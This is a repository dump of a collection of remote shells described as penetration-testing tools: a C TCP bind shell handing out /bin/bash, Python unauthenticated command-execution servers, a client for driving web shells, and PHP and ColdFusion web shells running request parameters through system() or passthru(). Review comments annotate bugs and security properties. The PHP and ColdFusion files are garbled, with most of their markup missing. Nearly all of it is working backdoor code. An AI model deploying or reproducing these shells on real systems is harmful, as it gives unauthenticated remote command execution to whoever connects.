├── README.md
├── bindshell.c
├── cliweb.py
├── coldfusion.cfm
├── coldfusion2.cfm
├── multi.py
├── php-eval.php
├── php-form.php
├── single-commands.py
└── webshell.php

/README.md:
--------------------------------------------------------------------------------
[![Say Thanks](https://img.shields.io/badge/Say%20Thanks-!-1EAEDB.svg?style=flat)](https://saythanks.io/to/deadbits)

# shells
This is a collection of various shells to be used _during penetration testing or during your own testing within a lab environment._
The code in this repository *is not* meant for malicious use of any kind. It is here for professional and learning purposes only.

--------------------------------------------------------------------------------
/bindshell.c:
--------------------------------------------------------------------------------
/*
 * basic TCP bindshell
 *
 * https://github.com/deadbits/shells
 */

/* NOTE(review): the header names after each #include were lost when this
 * page was extracted; the directives are left exactly as they appear. */
#include
#include
#include
#include
#include
#include
//#include

#define SHELL "/bin/bash" // shell to spawn when connection is received

/*
 * main - listen on the TCP port given in argv[1] and attach SHELL to every
 * connection that is accepted.
 *
 * argv[1] is the port number; any other argument count prints the usage
 * line and returns -1.
 *
 * Security-relevant properties visible in this function:
 *   - the socket is bound to INADDR_ANY, i.e. every local interface;
 *   - nothing between accept() and execl() authenticates the peer or
 *     encrypts the stream, so any host that can reach the port gets SHELL
 *     with the privileges of the user who started the program;
 *   - the spawned shell has descriptors 0, 1 and 2 pointing at the TCP
 *     socket, which is what a process/socket inventory of the host shows.
 */
int main(int argc, char *argv[])
{
    char msg[512];
    int srv_sockfd, new_sockfd;
    socklen_t new_addrlen;
    struct sockaddr_in srv_addr, new_addr;

    if(argc != 2)
    {
        printf("\nusage: ./tcpbind \n");
        return -1;
    }

    /* All of the listener logic runs in a forked child; the parent falls
     * through to the final return, so the invoking shell gets its prompt
     * back while the listener keeps running. */
    if(fork() == 0)
    {
        if((srv_sockfd = socket(PF_INET, SOCK_STREAM, 0)) < 0)
        {
            perror("[error] socket() failed!");
            return -1;
        }

        srv_addr.sin_family = PF_INET;
        /* atoi() performs no validation: a non-numeric argument yields 0. */
        srv_addr.sin_port = htons(atoi(argv[1]));
        srv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
        if(bind(srv_sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr)) < 0)
        {
            perror("[error] bind() failed!");
            return -1;
        }

        if(listen(srv_sockfd, 1) < 0)
        {
            perror("[error] listen() failed!");
            return -1;
        }

        for(;;)
        {
            new_addrlen = sizeof(new_addr);
            new_sockfd = accept(srv_sockfd, (struct sockaddr *)&new_addr, &new_addrlen);
            if(new_sockfd < 0)
            {
                perror("[error] accept() failed!");
                return -1;
            }

            /* One child per connection. No wait()/SIGCHLD handling is
             * visible here, so finished children are presumably left as
             * zombies until the listener exits. */
            if(fork() == 0)
            {
                close(srv_sockfd);
                /* NOTE(review): msg is never written before this call, so
                 * strlen()/write() operate on uninitialised stack memory:
                 * undefined behaviour, and whatever bytes are found are
                 * sent to the peer. */
                write(new_sockfd, msg, strlen(msg));

                /* stderr, stdout and stdin are all redirected to the
                 * client socket before the shell replaces this process. */
                dup2(new_sockfd, 2);
                dup2(new_sockfd, 1);
                dup2(new_sockfd, 0);

                /* NOTE(review): argv[0] is passed as NULL. The return below
                 * is only reached if execl() fails. */
                execl(SHELL, NULL, NULL);
                return 0;
            }
            else
                close(new_sockfd);
        }

    }
    return 0;
}


--------------------------------------------------------------------------------
/cliweb.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python

import os
import sys
import requests
import urllib

usage = """
[ CLI Web-Shell - version 1.0 ]
-----------------------------

This script provides you with a command line
interface to a standard RCE web shell. You are
given pseudo sh prompt, when commands are entered
an HTTP request is made to the webshell where the
results are returned and displayed back to your
terminal session, simulating a standard bindshell.

usage: ./webcli.py
example: ./webcli.py http://target.host/shell.php?cmd=

*note: currently this script only supports shells shown
in the format above: "target.host/script.blah?var=".
if you are using a different format for your shell, simply
edit this script to meet your specifications. it's not hard.

"""

def shell(url, param):
    """Run an interactive prompt that relays each typed line to a web endpoint.

    url is the endpoint and param the name of the query parameter that
    carries the typed line. Each line is sent with an HTTP GET; the response
    body is printed only when the status code is 200, any other status
    produces no output at all.

    Because the typed line travels as a query-string value, it is part of
    the request URL and therefore appears wherever request URLs are
    recorded (web server access logs, proxy logs).
    """
    while True:
        # raw_input and the print statements below make this Python 2 only.
        cmd = raw_input("shell >> ")
        if cmd == "exit" or cmd == "quit":
            # NOTE(review): only a message is printed here; no break or
            # return is visible, so the prompt loop continues afterwards.
            print("[*] closing shell ...")
        else:
            p = { param : cmd }
            req = requests.get(url, params=p)
            if req.status_code == 200:
                try:
                    data = req.content.split("\n")
                    for line in data:
                        print line
                # Bare except: any failure while splitting or printing falls
                # back to printing the raw body.
                except:
                    print req.content

if __name__ == '__main__':
    try:
        target = sys.argv[1]
        if "?" in target:
            # The text before the first "?" is the endpoint; the text after
            # it (up to any second "?"), with leading/trailing "=" removed,
            # is used as the parameter name.
            url, param = target.split("?")[0], target.split("?")[1].strip("=")
            shell(url, param)
        else:
            print("[error] target URL does not meet format requirements!")
            sys.exit(1)
    # Raised by sys.argv[1] when the script is started without an argument.
    except IndexError:
        print(usage)
--------------------------------------------------------------------------------
/coldfusion.cfm:
--------------------------------------------------------------------------------
1 | 2 | 3 | CF Shell 4 | 8 | 9 | 10 |
11 | 12 | 13 |
14 | 15 | 16 | -------------------------------------------------------------------------------- /coldfusion2.cfm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |
5 | 6 | 7 | 8 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 |
Command: 9 | value="#form.cmd#"> 10 |
Options: value="#form.opts#">
Timeout:value="#form.timeout#" value="5">
21 | 22 |
23 | 24 | 25 | 26 | 27 | 28 |
29 | 			#myVar#
30 | 		
31 |
32 |
33 | 34 | 35 |
--------------------------------------------------------------------------------
/multi.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
##
# multi-connection tcp server
# stripped from Intersect Framework
##

import os, sys
import socket
import time
from subprocess import Popen,PIPE,STDOUT,call

def reaper():
    """Collect exited child processes without blocking.

    Loops while activePID is non-empty. os.waitpid(0, os.WNOHANG) returns
    pid 0 when no child has exited yet, which ends the loop; otherwise the
    reaped pid is removed from activePID.
    """
    while activePID:
        pid,stat = os.waitpid(0, os.WNOHANG)
        if not pid: break
        activePID.remove(pid)

def handler(connection):
    """Serve one client: execute every received chunk and send back stdout.

    Runs in the forked child created by accept(). Each recv() result is
    handed to Popen with shell=True before it is compared against "cd" or
    ":quit", so those control strings are also passed to the shell.

    Security-relevant properties visible in this function: the peer is never
    authenticated, the bytes read from the socket are executed by a shell
    unmodified, and both directions travel over the plain TCP socket.
    """
    while True:
        # NOTE(review): an empty recv() result (peer closed the connection)
        # is not checked; presumably the loop then keeps spawning empty
        # shell commands - confirm.
        cmd = connection.recv(socksize)
        proc = Popen(cmd,
            shell=True,
            stdout=PIPE,
            stderr=PIPE,
            stdin=PIPE,
            )
        # stderr is collected but never sent to the client.
        stdout, stderr = proc.communicate()
        if cmd.startswith('cd'):
            # A cd inside the Popen child would not persist, so the working
            # directory is changed in this process instead.
            try:
                destination = cmd[3:].replace('\n','')
                if os.path.isdir(destination):
                    os.chdir(destination)
                    current = os.getcwd()
                    connection.send("[*] %s" % current)
                else:
                    connection.send("[!] Directory does not exist")
            except IndexError:
                pass
        # Exact comparison: presumably a trailing newline from the client
        # prevents a match - confirm.
        elif cmd == (":quit"):
            connection.close()
            os._exit(0)
            # Not reached: os._exit() above ends the process immediately.
            sys.exit(0)
        elif proc:
            connection.send( stdout )
            connection.send("[shell] => ")

    # Not reached: the while loop above has no break.
    connection.close()
    os._exit(0)


def accept():
    """Accept connections forever and fork one handler process per client.

    Reads the module-level listening socket conn, and rebinds the
    module-level name connection on every iteration. The child runs
    handler(); the parent records the child's pid in activePID so that
    reaper() can collect it on a later iteration.
    """
    while 1:
        global connection
        connection, address = conn.accept()
        connection.send("[shell] => ")
        reaper()
        childPid = os.fork()
        if childPid == 0:
            handler(connection)
        else:
            # NOTE(review): the parent does not close its copy of the client
            # socket here.
            activePID.append(childPid)

# Maximum number of bytes read per recv() call in handler().
socksize = 4096
# Pids of forked handler processes that have not been reaped yet.
activePID = []
# The bare except covers argument parsing, bind(), listen() and the whole
# accept() loop, so every failure in the parent is reported as the usage line.
try:
    host, port = sys.argv[1], int(sys.argv[2])
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.bind((host, port))
    conn.listen(5)
    accept()
except:
    print("usage: ./multi.py ")
    sys.exit(1)


--------------------------------------------------------------------------------
/php-eval.php:
--------------------------------------------------------------------------------
1 | 2 | 3 | "; 7 | $cmd = ($_REQUEST['cmd']); 8 | system($cmd); 9 | echo ""; 10 | die; 11 | } 12 | 13 | ?> 14 | 15 |
--------------------------------------------------------------------------------
/php-form.php:
--------------------------------------------------------------------------------
1 | 2 | 3 | 4 | 5 |
6 | 7 | 8 |
9 |
10 | 
15 |    
16 | 17 | 18 | 19 | 20 |
--------------------------------------------------------------------------------
/single-commands.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
##
# simple tcp server using 'commands' library
##

import os, sys
import socket
# The commands module exists only in Python 2.
import commands

# Maximum number of bytes read per recv() call.
socksize = 4096
# Collected once when the module is loaded and sent to the client as a banner
# by bind(). os.environ[...] raises KeyError when USER or HOME is unset, and
# this statement is outside the try block at the bottom of the file.
info = {
    'uname': commands.getoutput('uname -ar'),
    'uid': commands.getoutput('id'),
    'user': os.environ['USER'],
    'home': os.environ['HOME']
    }

def bind(host, port):
    """Accept a single TCP client and execute every line it sends.

    Binds to (host, port), accepts one connection, sends the contents of
    info followed by a prompt, then runs each received chunk through
    commands.getoutput() and returns the output. The literal "quit!" closes
    the connection and exits the process.

    Security-relevant properties visible in this function: the peer is never
    authenticated, received bytes are executed by a shell with only "\\n"
    stripped, and host details from info are disclosed to whoever connects,
    all over the plain TCP socket.
    """
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server.bind((host, port))
        server.listen(5)
    except:
        sys.exit(1)

    # accept() is called once, outside any loop: only the first client is
    # ever served.
    conn, addr = server.accept()
    # iteritems() is Python 2 only.
    for k, v in info.iteritems():
        conn.sendall('%s\t%s' % (k, v))
    conn.sendall("\nshell >> ")
    while True:
        # NOTE(review): an empty recv() result (peer closed the connection)
        # is not checked - confirm how the loop behaves in that case.
        cmd = conn.recv(socksize)
        if cmd.strip("\n") == "quit!":
            conn.close()
            sys.exit()
        else:
            out = commands.getoutput(cmd.strip("\n"))
            conn.sendall(out)
            conn.sendall("\nshell >> ")

    # Not reached: the while loop above has no break.
    conn.close()
    sys.exit()

# The bare except also catches the SystemExit raised by the sys.exit() calls
# inside bind(), so every exit path through bind() ends with the usage line
# and exit status 1.
try:
    host, port = sys.argv[1], sys.argv[2]
    bind(host, int(port))
except:
    print("usage: ./tcp.py ")
    sys.exit(1)


--------------------------------------------------------------------------------
/webshell.php:
--------------------------------------------------------------------------------
1 | 2 | 3 | 4 | 5 | PHP web shell 6 | 7 | 8 |

lol owned.



9 |
10 | command: 11 | 12 |
13 | 14 | '. htmlentities($command). '
';
17 |   		passthru("$command");
18 |   		echo '
'; 19 | } 20 | ?> 21 | 22 | 23 | --------------------------------------------------------------------------------